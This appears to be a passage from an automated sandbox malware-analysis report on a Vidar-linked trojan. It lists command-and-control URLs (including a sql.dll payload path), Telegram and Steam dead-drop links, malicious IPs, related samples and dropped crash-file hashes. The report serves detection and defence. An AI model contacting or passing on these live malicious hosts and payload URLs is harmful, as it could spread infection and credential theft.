                                        https://t.me/ae5edlCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                        • URL Reputation: malware
                                        unknown
                                        http://cowod.hopto.org_DEBUG.zip/clCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                          unknown
                                          http://lade.petperfectcare.com:80t-Disposition:MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmpfalse
                                            unknown
                                            http://lade.petperfectcare.com//(MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://lade.petperfectcare.com/4MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://lade.petperfectcare.com/TMSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://upx.sf.netAmcache.hve.6.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://lade.petperfectcare.com:80lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://lade.petperfectcare.com:80/sql.dllineID:MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://lade.petperfectcare.com:80/sql.dllMSBuild.exe, 00000003.00000002.1980647487.000000000048F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          95.164.90.97
                                                          lade.petperfectcare.comGibraltar
                                                          39762VAKPoltavaUkraineUAtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1528302
                                                          Start date and time:2024-10-07 18:45:18 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 17s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:lCVFGKfczi.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:b84100c670bb19e92bfb62423048aa43.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@9/10@1/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 93%
                                                          • Number of executed functions: 43
                                                          • Number of non-executed functions: 132
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 40.126.32.76, 40.126.32.74, 40.126.32.134, 40.126.32.138, 40.126.32.68, 20.190.160.22, 40.126.32.72, 20.190.160.20, 199.232.214.172, 192.229.221.95, 20.189.173.22, 52.149.20.212, 13.95.31.18, 20.42.73.29, 20.242.39.171
                                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: lCVFGKfczi.exe
                                                          TimeTypeDescription
                                                          12:46:24API Interceptor2x Sleep call for process: WerFault.exe modified
                                                          12:46:36API Interceptor1x Sleep call for process: MSBuild.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          95.164.90.97VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • lade.petperfectcare.com/
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          gIXLkTvFeC.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          0FZVLEdDuc.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          MPil9jkBPG.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          gpfSnYlScw.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • lade.petperfectcare.com/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          s-part-0017.t-0009.t-msedge.netz71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 13.107.246.45
                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 13.107.246.45
                                                          https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                          • 13.107.246.45
                                                          Payment.vbsGet hashmaliciousFormBookBrowse
                                                          • 13.107.246.45
                                                          original.emlGet hashmaliciousTycoon2FABrowse
                                                          • 13.107.246.45
                                                          5fe2eenspI.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          https://kohlhage-de.powerappsportals.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                          • 13.107.246.45
                                                          lade.petperfectcare.comVLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          gIXLkTvFeC.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          0FZVLEdDuc.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          MPil9jkBPG.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          gpfSnYlScw.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          bg.microsoft.map.fastly.netNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 199.232.210.172
                                                          vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                          • 199.232.214.172
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 199.232.214.172
                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 199.232.214.172
                                                          file.exeGet hashmaliciousStealcBrowse
                                                          • 199.232.210.172
                                                          https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          https://eu.pbe.encryption.symantec.com/login.html?msgUserId=682e23d9f715c97c&enterprise=lgas&locale=en_USGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                          • 199.232.210.172
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          VAKPoltavaUkraineUAVLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          gIXLkTvFeC.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          0FZVLEdDuc.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          MPil9jkBPG.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          gpfSnYlScw.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.90.97
                                                          bind.aspx.exeGet hashmaliciousVidarBrowse
                                                          • 95.164.119.162
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          1138de370e523e824bbca92d049a37771f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 13.107.246.45
                                                          https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 13.107.246.45
                                                          https://fenster-mark-gmbhsharefile.btn-ebikes.com/Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          Hscni Remittance_8115919700_16831215.htmlGet hashmaliciousTycoon2FABrowse
                                                          • 13.107.246.45
                                                          xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                          • 13.107.246.45
                                                          High Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 13.107.246.45
                                                          28a2c9bd18a11de089ef85a160da29e41f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 13.107.246.45
                                                          VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 13.107.246.45
                                                          vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                          • 13.107.246.45
                                                          5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                                          • 13.107.246.45
                                                          https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                          • 13.107.246.45
                                                          https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                          • 13.107.246.45
                                                          Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 13.107.246.45
                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 13.107.246.45
                                                          No context
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.0699614957794892
                                                          Encrypted:false
                                                          SSDEEP:192:zkIubcOYdTA0Nvw4sjMAZrdAmN9zuiFkZ24IO8q:PuDqTbNvwpjJH9zuiFkY4IO8q
                                                          MD5:C50D511371060F15573EFA09383231FE
                                                          SHA1:DE545F5EC7B39446F0A5E1557568EC9C1AB3F891
                                                          SHA-256:72C326D34C5D6381D146145FED0673D7C6AA71E8F497BAD377DC75F90955906F
                                                          SHA-512:1FD0ED27908361ADFFF1F138A3658858DA7383F165E53CE57ECFB198B137266D7A8F10E986FEC44756B94C395365C2DC4E5106B7558CCE6F4CBBA782BDC119BA
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.9.6.4.5.2.2.3.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.9.7.7.9.6.0.1.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.b.3.e.a.8.6.-.3.d.7.4.-.4.b.1.d.-.a.d.9.8.-.b.d.c.1.3.2.5.1.b.4.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.a.0.8.d.a.2.-.4.8.d.7.-.4.9.b.e.-.8.1.1.9.-.6.1.e.f.b.6.3.f.a.1.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.c.-.0.0.0.1.-.0.0.1.4.-.9.e.b.a.-.f.5.6.8.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.6540635265483035
                                                          Encrypted:false
                                                          SSDEEP:96:Nv8FqQ0FJZ6KsYyAyA1fxQXIDcQvc6QcEVcw3cE/H+HbHg/5hZAX/d5FMT2SlPk9:KcQs6K40BU/AjhzuiFkZ24IO8n
                                                          MD5:24046B75302B6F55D478F9C29F2C1284
                                                          SHA1:7C5B52DBDF567B74CE7D17FAEB35DAAFE1DFA0AD
                                                          SHA-256:3567E33DB2F2794F3EC1BF488F470CF2EBAB91E28ADC03316CE54CBE8261E187
                                                          SHA-512:9CEDB8E8FAB96C8C0228532731772D3EAE25AB9FEC9504E2294712E488AE6E21B070D84DBE6932AE2A9005E731A7B24A4CAF71071A7A57164419BE97E5AE33EA
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.9.4.3.3.4.1.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.9.8.0.8.4.1.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.4.9.9.f.a.b.-.c.a.7.d.-.4.4.1.7.-.8.d.d.7.-.5.f.2.6.e.4.0.6.8.e.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.c.9.1.d.6.9.-.f.b.2.9.-.4.2.d.2.-.a.b.4.3.-.1.0.f.8.a.9.5.7.2.c.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.C.V.F.G.K.f.c.z.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.c.-.0.0.0.1.-.0.0.1.4.-.3.e.e.4.-.d.5.6.8.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.9.2.f.3.a.e.f.7.a.d.9.3.d.b.6.5.2.7.d.8.e.9.d.0.6.b.2.e.b.b.a.e.1.a.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:09 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):35464
                                                          Entropy (8bit):1.674361653226171
                                                          Encrypted:false
                                                          SSDEEP:96:5H84WUe6zJWsEAkGKni77sX3APmCFJZT7sj2J3rAFxMg7BWIkWIPTkI4JytUCQJK:uTU7nSOtOCFJZEqJ3/hgJytUCRv
                                                          MD5:38EC3CEB28FFE8FD1FB088AE3190ED72
                                                          SHA1:18C523FDF6098E838D82C4B9C3DFC7C692AF8014
                                                          SHA-256:44928FC56B56AC242842B221E0B4AF52B89667E916A6089F4EAA2F2F2D4D3D2E
                                                          SHA-512:ABA7A755682FA183AFD639D61D9EFE4D1384731C5BEE247987B89DBF3A0331A043E1FFFBE2827F0C1FDE5EC325C75EE7350C09F1127CC342DF3D600EBDF24FC1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......Q..g........................d...........................T.......8...........T...........P...8.......................................................................................................eJ..............GenuineIntel............T...........P..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8328
                                                          Entropy (8bit):3.7007404467825675
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJhlK6KLk6Y9ZSUXlgmfQGWuVprr89bkasfZMm:R6lXJe6Ko6YDSUXlgmfQGWu0k5fX
                                                          MD5:E40DBBCF05489ABC02888A41620E5060
                                                          SHA1:41CBF11804020E6FB4287777CCC9946E8648DD1C
                                                          SHA-256:26365AD3D6A871BAA45887CAE67BBCE9F32DA05A8FF9CB747EDF4CF974925CD7
                                                          SHA-512:4959D7B18F1585011504A0194A909BFFE2B8AB0DA58F692E0E343E858AE108ADA9516BBCAA820EFCF66542B625F9E9BEBD1D8882388B398FA8DC26B385AD06D8
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.4.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4678
                                                          Entropy (8bit):4.49462098810929
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsEuJg77aI9t6WpW8VYvYm8M4JDeBwbFY2to+q8MscGaCiJfuZuhd:uIjfEkI7b77V/J8yaMIhd
                                                          MD5:7EACD858711D72270FBB68CB183258F8
                                                          SHA1:FC30E0B42A6DCA9D989D12CABA1CEC35AB05CEB1
                                                          SHA-256:4BAF1B8EE56FD4C656AC0AC7A17E0FD72191AE843F15DD7DC7D7ED5532759611
                                                          SHA-512:4EA200222EB31AC2B79C08B8984196B10F80865BBA441B8BBDCA69F17C35FD42C193227DD54952B9E3BFCBFD5F1B8F02DDA5EE26EC76AEAEB1488CD377D5D1D6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:37 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):146104
                                                          Entropy (8bit):1.8212223528158107
                                                          Encrypted:false
                                                          SSDEEP:768:zcS5IZR/1geyG7yS0OWUTX8nxGES9NmSZXeMZ0FV56IZ2O:zDrOXMl2MSZXeMZ0FV56IZ2O
                                                          MD5:96CC2527E5E5DE10C681C387BED7795E
                                                          SHA1:715C0FEA4EF2C233CA73DCFF772F7A25F7E8D710
                                                          SHA-256:CC877BF0C5D1470ABE51ED03FEAA5D9255B208E65AD9177E4B08CFB4DD1CAB1F
